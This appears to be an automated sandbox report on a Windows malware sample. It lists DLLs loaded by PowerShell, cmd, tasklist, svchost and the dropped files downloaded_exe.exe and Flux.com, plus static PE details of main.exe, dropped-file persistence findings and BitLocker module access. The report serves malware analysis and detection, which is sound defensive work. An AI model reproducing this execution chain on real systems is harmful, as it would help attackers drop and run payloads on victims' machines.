Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll

Source: C:\Users\user\Desktop\main.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: main.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: main.exe

Static file information: File size 2857365 > 1048576

Source: main.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: svchost.exe, 00000017.00000003.2579206476.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2579362809.0000000004D10000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: svchost.exe, 00000017.00000003.2579589232.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2579847593.0000000004E10000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: svchost.exe, 00000017.00000003.2577797743.0000000004DE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2577157449.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: svchost.exe, 00000017.00000003.2578336206.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2578901434.0000000004D90000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: svchost.exe, 00000017.00000003.2577797743.0000000004DE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2577157449.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: svchost.exe, 00000017.00000003.2578336206.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2578901434.0000000004D90000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: svchost.exe, 00000017.00000003.2579206476.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2579362809.0000000004D10000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000017.00000003.2579589232.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2579847593.0000000004E10000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7FE90A370 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

0_2_00007FF7FE90A370

Source: downloaded_exe.exe.0.dr

Static PE information: real checksum: 0x13a887 should be: 0x13ea98

Source: main.exe	Static PE information: section name: .xdata
Source: main.exe	Static PE information: section name: /4
Source: main.exe	Static PE information: section name: /19
Source: main.exe	Static PE information: section name: /31
Source: main.exe	Static PE information: section name: /45
Source: main.exe	Static PE information: section name: /57
Source: main.exe	Static PE information: section name: /70
Source: main.exe	Static PE information: section name: /81
Source: main.exe	Static PE information: section name: /97
Source: main.exe	Static PE information: section name: /113

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_0047225D push eax; ret	23_3_0047225F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_00475606 pushad ; retf	23_3_00475619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_00476012 push 00000038h; iretd	23_3_0047601D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_004718C0 push ebp; retf	23_3_004718C1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_004728ED push ebx; ret	23_3_004728E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_0047588E push eax; iretd	23_3_0047589D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_004758BC pushad ; ret	23_3_004758C1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_00471179 push FFFFFF82h; iretd	23_3_0047117B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_00475F0C push es; iretd	23_3_00475F0D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_00474920 push 0000002Eh; iretd	23_3_00474922
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_00475FEE push FFFFFFD2h; retf	23_3_00476011
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_00470FEA push eax; ret	23_3_00470FF5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_3_0047278B push ebx; ret	23_3_004728E4

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\542181\Flux.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\542181\Flux.com			Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
